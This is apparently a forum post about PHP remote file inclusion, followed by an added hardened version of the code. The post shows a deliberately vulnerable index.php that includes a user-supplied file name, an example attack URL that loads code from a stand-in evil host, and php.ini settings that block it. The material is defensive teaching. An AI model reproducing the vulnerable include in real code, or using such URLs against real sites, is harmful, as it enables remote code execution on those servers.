Posted by: stevenmartin99 (---.b-ras2.blp.dublin.eircom.net)
Not exactly, look at this code example:
index.php
<?php
$filename = $_GET['file'];
include $filename.".php";
?>
Someone goes to the site
http://mysite.com?file=11 and is brought to page 11. GREAT!
Someone goes to
http://mysite.com?file=http://evilsite.com/evil_virus_code.txt? and now the virus code is included in your page.
To stop this happening, change the following in php.ini:
-------------------------------------------
allow_url_fopen = OFF
allow_url_include = OFF
register_globals = OFF
Steven Martin
stevenmartin99@gmail.com
stevenmartin99@hotmail.com
PampServer.com - [pampserver.com]
Edited 3 time(s). Last edit at 09/07/2010 10:02AM by stevenmartin99.
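
An added example, not part of the original post: a hardened form of the index.php above that maps ?file= onto an allowlisted name inside a fixed directory, which also covers local paths that the php.ini settings do not affect. The pages/ directory and the resolve_page() helper are assumptions made for illustration, and PHP 8 or later is assumed.

```php
<?php
declare(strict_types=1);

// Assumption: page scripts live in ./pages/ next to index.php (hypothetical layout).
const PAGES_DIR = __DIR__ . '/pages';

/**
 * Map the ?file= value to a script inside $pagesDir, or return null to reject it.
 * resolve_page() is a hypothetical helper, not a PHP built-in.
 */
function resolve_page(mixed $requested, string $pagesDir = PAGES_DIR): ?string
{
    // Missing values and arrays (?file[]=x) are rejected outright.
    if (!is_string($requested)) {
        return null;
    }
    // Short alphanumeric names only: no scheme, slash, dot or NUL byte can pass.
    if (preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $requested) !== 1) {
        return null;
    }
    $base = realpath($pagesDir);
    $path = realpath($pagesDir . '/' . $requested . '.php');
    if ($base === false || $path === false) {
        return null; // the directory or the page does not exist
    }
    // Defence in depth: the resolved path (symlinks followed) must stay inside $base.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

if (PHP_SAPI === 'cli') {
    // Constructed sample inputs: the two request values from the post plus an array.
    // '11' resolves only if pages/11.php exists; the others are always rejected.
    $samples = ['11', 'http://evilsite.com/evil_virus_code.txt?', ['x']];
    foreach ($samples as $s) {
        printf("%-48s => %s\n", json_encode($s, JSON_UNESCAPED_SLASHES), resolve_page($s) ?? 'rejected');
    }
} else {
    $page = resolve_page($_GET['file'] ?? null);
    if ($page === null) {
        http_response_code(404);
        exit('Page not found');
    }
    include $page; // always a real file under PAGES_DIR, never the raw request value
}
```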